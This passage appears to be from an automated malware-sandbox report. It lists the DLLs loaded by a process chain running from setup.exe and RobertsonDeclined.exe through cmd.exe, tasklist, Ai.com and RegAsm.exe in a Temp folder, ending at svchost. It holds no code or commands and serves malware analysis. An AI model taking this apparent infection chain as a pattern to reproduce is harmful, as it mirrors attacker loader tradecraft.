                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dinput8.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: xinput1_4.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: inputhost.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: hid.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: opengl32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: glu32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: thumbcache.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: d3d11.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dcomp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dxgi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: networkexplorer.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\findstr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\findstr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
